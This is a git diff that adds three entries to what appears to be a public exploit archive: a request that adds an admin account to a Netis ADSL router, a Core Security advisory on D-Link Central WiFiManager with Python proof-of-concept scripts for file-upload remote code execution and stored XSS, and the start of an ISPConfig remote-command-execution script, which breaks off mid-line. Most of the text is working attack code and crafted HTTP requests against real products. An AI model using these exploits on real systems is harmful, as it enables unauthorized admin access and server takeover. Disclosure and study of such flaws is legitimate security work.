diff --git a/exploits/hardware/webapps/45532.txt b/exploits/hardware/webapps/45532.txt
new file mode 100644
index 000000000..6a8bb75f0
--- /dev/null
+++ b/exploits/hardware/webapps/45532.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)
+# Author: Cakes
+# Discovery Date: 2018-10-01
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description
+# Due to improper session management an attacker is able to add a administrator account
+# without providing any authentication credentials.
+
+# PoC 1
+POST /form2userconfig.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 112
+
+username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
+
+# PoC 2
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45533.txt b/exploits/php/webapps/45533.txt
new file mode 100644
index 000000000..c8021a4fc
--- /dev/null
+++ b/exploits/php/webapps/45533.txt
@@ -0,0 +1,315 @@
+Core Security - Corelabs Advisory
+http://corelabs.coresecurity.com/
+
+D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
+
+1. *Advisory Information*
+
+Title: D-Link Central WiFiManager Software Controller Multiple
+Vulnerabilities
+Advisory ID: CORE-2018-0010
+Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
+Date published: 2018-10-04
+Date of last update: 2018-10-04
+Vendors contacted: D-Link
+Release mode: Coordinated release
+
+2. *Vulnerability Information*
+
+Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
+Improper Authorization [CWE-285], Improper Neutralization of Input
+During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
+Neutralization of Input During Web Page Generation
+('Cross-site Scripting') [CWE-79]
+Impact: Code execution
+Remotely Exploitable: Yes
+Locally Exploitable: Yes
+CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
+
+3. *Vulnerability Description*
+
+D-Link's website states that:
+
+[1] Central WiFiManager Software Controller helps network administrators
+streamline their wireless access point (AP) management workflow. Central
+WiFiManager is an innovative approach to the more traditional
+hardware-based multiple access point management system. It uses a
+centralized server to both remotely manage and monitor wireless APs on a
+network.
+
+Vulnerabilities were found in the Central WiFiManager Software
+Controller, allowing unauthenticated and authenticated file upload with
+dangerous type that could lead to remote code execution with system
+permissions. Also, two stored Cross Site Scripting vulnerabilities were
+found.
+
+4. *Vulnerable Packages*
+
+ . Central WifiManager v1.03
+
+Other products and versions might be affected, but they were not tested.
+
+5. *Vendor Information, Solutions and Workarounds*
+
+D-Link released the following Beta version that addresses the reported vulnerabilities:
+
+ . Central WifiManager v 1.03r0100-Beta1
+
+In addition, D-Link published a security note in:
+https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
+
+6. *Credits*
+
+These vulnerabilities were discovered and researched by Julian Muñoz
+from Core Security Consulting Services. The publication of this advisory
+was coordinated by Leandro Cuozzo from Core Advisories Team.
+
+7. *Technical Description / Proof of Concept Code*
+
+D-Link Central WiFiManager Software Controller exposes an FTP server
+that serves by default in port 9000 and has hardcoded credentials
+(admin, admin). Taking advantage of this fact, we will upload a PHP file
+in the '/web/public' directory and then, by requesting this file, will
+be able to execute arbitrary code on the target system (shown in 7.1).
+
+On 7.2 we show a similar attack to but in this case with an
+authenticated user in the web application. The application has a
+functionality to upload a .rar file used for the captive portal
+displayed by the Access Points. We will craft a .rar with a PHP file
+that we will end up executing in the context of the web application.
+When the .rar is uploaded is stored in the path "\web\captivalportal" in
+a folder with a timestamp created by the PHP time() function. In order
+to know what is the web server's time we request an information file
+that contains the time we are looking for. After we have the server's
+time we upload the .rar, calculate the proper epoch and request the
+appropriate path increasing this epoch by one until we hit the correct
+one.
+
+Finally, we discovered two Cross-Site Scripting, one on the update site
+functionality, in the 'sitename' parameter (7.3) and the other one on
+the creation of a local user in the 'username' parameter (7.4).
+
+7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
+File with Dangerous Type*
+
+[CVE-2018-17440] The web application starts an FTP server running on the
+port 9000 by default with admin/admin credentials and do not show the
+option to change it, so in this POC we establish a connection with the
+server and upload a PHP file. Since the application do not restrict
+unauthenticated users to request any file in the web root, we later
+request the uploaded file to achieve remote code execution.
+
+/-----
+import requests
+from ftplib import FTP
+
+#stablish connection with FTP server
+host_ip = "127.0.0.1"
+ftp = FTP()
+ftp.connect(host=host_ip, port=9000)
+ftp.login("admin", "admin")
+data = []
+
+#create PHP poc file
+poc_php_file = open("poc.php", "w+")
+poc_php_file.write("")
+poc_php_file.close()
+
+#upload PHP poc file
+php_file = open("poc.php", "rb")
+ftp.cwd('/web/public')
+ftp.storbinary("STOR write_file.php", php_file)
+ftp.dir(data.append)
+ftp.quit()
+
+for line in data:
+ print "-", line
+
+session = requests.Session()
+session.trust_env = False
+
+#get the uploaded file for remote code execution
+get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
+
+print get_uploaded_file.text
+-----/
+
+7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*
+
+[CVE-2018-17442] In this case we make a file upload using the
+functionality given by the onUploadLogPic endpoint, that will take a
+.rar file, decompress it and store it in a folder named after the PHP
+time() function. Our goal is first obtain the server's time, upload a
+.rar with our PHP file, calculate the proper epoch and iterate
+increasing it until we hit the proper one and remote code execution is
+achieved.
+
+/-----
+import re
+import time
+import requests
+import datetime
+import tarfile
+
+def parse_to_datetime(date_string):
+ date_list = date_string.split("-")
+ td = date_list[2][2:].split(":")
+ return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))
+
+session = requests.Session()
+session.trust_env = False
+php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
+cookie = {'PHPSESSID': php_session_id}
+
+#create tar file to upload.
+poc_php_file = open("poc.php", "w+")
+poc_php_file.write("")
+poc_php_file.close()
+
+poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
+poc_tar_file.add("poc.php")
+poc_tar_file.close()
+
+#get server datetime.
+get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
+ cookies=cookie, verify=False)
+date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
+#generate epoch from server's date
+epoch = int(time.mktime(parse_to_datetime(date).timetuple()))
+
+#upload attack PHP file.
+attack_tar_file = "poc_tar_file.tar"
+tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
+restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
+ files=tar_file,
+ cookies=cookie, verify=False)
+
+for i in range(0,20):
+ #get the uploaded file named after time epoch, returned by PHP time() function.
+ filename = str(epoch) + "/" + "poc.php"
+ get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
+ if get_uploaded_file.status_code == 200:
+ print "Remote Code Execution Achived"
+ print get_uploaded_file.text
+ break
+ epoch += 1
+-----/
+
+7.3. *Cross-Site Scripting in the application site name parameter*
+
+[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
+vulnerable to a stored Cross Site Scripting:
+
+The following is a proof of concept to demonstrate the vulnerability:
+
+/-----
+POST /index.php/Config/UpdateSite HTTP/1.1
+Host: 10.2.45.220
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.2.45.220/index.php/Config/CreatSite
+Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
+PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+
+siteid=0&sitename=&sitenamehid=fakesitename&UserMember%5B%5D=1
+-----/
+
+7.4. *Cross-Site Scripting in the creation of a new user*
+
+[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
+vulnerable to a stored Cross Site Scripting.
+
+The following is a proof of concept to demonstrate the vulnerability:
+
+/-----
+POST /index.php/System/addUser HTTP/1.1
+Host: 10.2.45.220
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.2.45.220/index.php/System/userManager
+Content-Type: application/x-www-form-urlencoded;
+Content-Length: 96
+Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
+PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
+Connection: close
+
+username=&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
+-----/
+
+8. *Report Timeline*
+
+2018-06-04: Core Security sent an initial notification to D-Link,
+including a draft advisory.
+2018-06-06:D-Link confirmed the reception of the advisory and informed
+they will have an initial response on 06/08.
+2018-06-08: D-Link informed that they would provide a schedule for the
+fixes on 06/13.
+2018-06-08: Core Security thanked the update.
+2018-06-14: D-Link informed its plan of remediation and notified Core
+Security that the fixed version will be available on 08/31.
+2018-06-15: Core Security thanked the update and proposed to keep in
+regular contact until this tentative release date.
+2018-07-23: Core Security requested a status update.
+2018-07-25: D-Link answered saying that they are still targeting 08/31
+as the release date.
+2018-08-24: Core Security requested a new status update and a solidified
+release date for the fixed version.
+2018-08-28: D-Link sent a beta version for test.
+2018-08-30: Core Security tested the beta version and requested D-Link
+to coordinate a release date.
+2018-09-21: D-Link informed that they were planning a security
+announcement and they were ready to schedule a disclosure date.
+2018-09-24: Core Security thanked the update and proposed October 4th as
+the publication date.
+2018-10-04: Advisory CORE-2018-0010 published.
+
+9. *References*
+
+[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.
+
+10. *About CoreLabs*
+
+CoreLabs, the research center of Core Security, is charged with
+anticipating the future needs and requirements for information security
+technologies. We conduct our research in several important areas of
+computer security including system vulnerabilities, cyber attack
+planning and simulation, source code auditing, and cryptography. Our
+results include problem formalization, identification of
+vulnerabilities, novel solutions and prototypes for new technologies.
+CoreLabs regularly publishes security advisories, technical papers,
+project information and shared software tools for public use at:
+http://corelabs.coresecurity.com.
+
+11. *About Core Security*
+
+Core Security provides companies with the security insight they need to
+know who, how, and what is vulnerable in their organization. The
+company's threat-aware, identity & access, network security, and
+vulnerability management solutions provide actionable insight and
+context needed to manage security risks across the enterprise. This
+shared insight gives customers a comprehensive view of their security
+posture to make better security remediation decisions. Better insight
+allows organizations to prioritize their efforts to protect critical
+assets, take action sooner to mitigate access risk, and react faster if
+a breach does occur.
+
+Core Security is headquartered in the USA with offices and operations in
+South America, Europe, Middle East and Asia. To learn more, contact Core
+Security at (678) 304-4500 or info@coresecurity.com
+
+12. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2018 Core Security and
+(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/
\ No newline at end of file
diff --git a/exploits/php/webapps/45534.py b/exploits/php/webapps/45534.py
new file mode 100755
index 000000000..2d36e939c
--- /dev/null
+++ b/exploits/php/webapps/45534.py
@@ -0,0 +1,143 @@
+# Title: ISPConfig < 3.1.13 - Remote Command Execution
+# Author: 0x09AL
+# Date: 20/08/2018
+# Vendor: https://www.ispconfig.org/
+#
+# Vulnerability Description
+#
+# There is an include on almost all the php files, which includes the language template.
+# For example:
+
+# In password_reset.php - Line 46 the following code tries to include the filename
+# that is specified in the $_SESSION['s']['language'] variable.
+#
+# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
+#
+# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
+# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
+# $_SESSION['s']['user']['language'] = $_POST['language'];
+# $_SESSION['s']['language'] = $_POST['language'];
+# } else {
+# $app->error('Invalid language.');
+# }
+#
+# The regex checks if the language contains two lower-case characters.
+# The problem is that everything that contains two [a-z] characters will match the regex.
+# Developer probably missed the ^ $ on the regex to match the entire file.
+#
+# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
+# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code
+# will get executed as the ispconfig account and not as our chroot-ed account.
+#
+# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
+# the entire clients.
+#
+# You need to specify the hostname:port , username, and password of the client.
+
+import requests
+import ftplib
+import json
+import time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+host = "host:8080"
+username = "username"
+password = "password"
+
+exp = requests.session()
+user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
+ftp_username = "randomusr1"
+domain = "pwned.com"
+site_id = 1
+payload_name = "pwned1"
+path = ""
+
+
+
+def login():
+ r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
+ if(r.text.find("wrong")>0):
+ print "[-] Incorrect credentials [-]"
+ else:
+ print "[+] Logged in Succesfully [+]"
+
+
+def createSite():
+
+ r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
+ _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
+ _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
+ phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
+ r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
+ pass
+
+def createFtp():
+ global site_id
+ r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
+ print "[+] Getting IDSof the sites [+]"
+ temp_array = r.text.split('